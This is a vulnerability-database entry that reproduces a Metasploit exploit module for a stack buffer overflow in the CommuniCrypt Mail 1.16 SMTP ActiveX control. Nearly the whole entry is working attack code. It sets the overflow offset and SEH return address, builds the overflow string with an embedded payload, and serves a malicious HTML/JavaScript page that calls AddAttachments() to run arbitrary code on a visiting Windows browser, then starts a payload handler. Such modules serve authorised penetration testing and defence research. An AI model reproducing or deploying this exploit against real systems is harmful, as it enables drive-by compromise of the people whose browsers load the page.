CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType
Stack Buffer Overflow in CommuniCrypt Mail 1.16 SMTP ActiveX Contro

                                                ##
# $Id: communicrypt_mail_activex.rb 9933 2010-07-26 19:30:02Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module exploits a stack buffer overflow in the ANSMTP.dll/AOSMTP.dll
				ActiveX Control provided by CommuniCrypt Mail 1.16.  By sending a overly
				long string to the &#34;AddAttachments()&#34; method, an attacker may be able to
				execute arbitrary code.
			},
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Author&#39;         =&#62;
				[
					&#39;Lincoln&#39;,  # Original exploit author
					&#39;dookie&#39;    # MSF module author
				],
			&#39;Version&#39;        =&#62; &#39;$Revision: 9933 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;OSVDB&#39;, &#39;64839&#39; ],
					[ &#39;URL&#39;, &#39;http://www.exploit-db.com/exploits/12663&#39; ],
				],
			&#39;DefaultOptions&#39; =&#62;
				{
					&#39;EXITFUNC&#39; =&#62; &#39;process&#39;,
				},
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;           =&#62; 1000,
					&#39;BadChars&#39;        =&#62; &#34;\x00\x09\x0a\x0d&#39;\\&#34;,
					&#39;StackAdjustment&#39; =&#62; -3500,
				},
			&#39;Platform&#39;       =&#62; &#39;win&#39;,
			&#39;Targets&#39;        =&#62;
				[
					[ &#39;Windows XP Universal&#39;, { &#39;Offset&#39; =&#62; 284, &#39;Ret&#39; =&#62; 0x1001e41c } ], #p/p/r in AOSMTP.dll
				],
			&#39;DisclosureDate&#39; =&#62; &#39;May 19 2010&#39;,
			&#39;DefaultTarget&#39;  =&#62; 0))
	end

	def autofilter
		false
	end

	def check_dependencies
		use_zlib
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Randomize some things
		vname   = rand_text_alpha(rand(100) + 1)
		strname = rand_text_alpha(rand(100) + 1)

		filler  = rand_text_alpha(target[&#39;Offset&#39;])
		seh     = generate_seh_payload(target.ret)
		trailer = rand_text_alpha(1000 - p.encoded.length)
		sploit  = filler + seh + p.encoded + trailer

		# Build out the message
		content = %Q|&#60;html&#62;
&#60;object classid=&#39;clsid:F8D07B72-B4B4-46A0-ACC0-C771D4614B82&#39; id=&#39;#{vname}&#39;&#62;&#60;/object&#62;
&#60;script language=&#39;javascript&#39;&#62;
var #{vname} = document.getElementById(&#39;#{vname}&#39;);
var #{strname} = new String(&#39;#{sploit}&#39;);
#{vname}.AddAttachments(#{strname});
&#60;/script&#62;
&#60;/html&#62;
|

		print_status(&#34;Sending exploit to #{cli.peerhost}:#{cli.peerport}...&#34;)

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1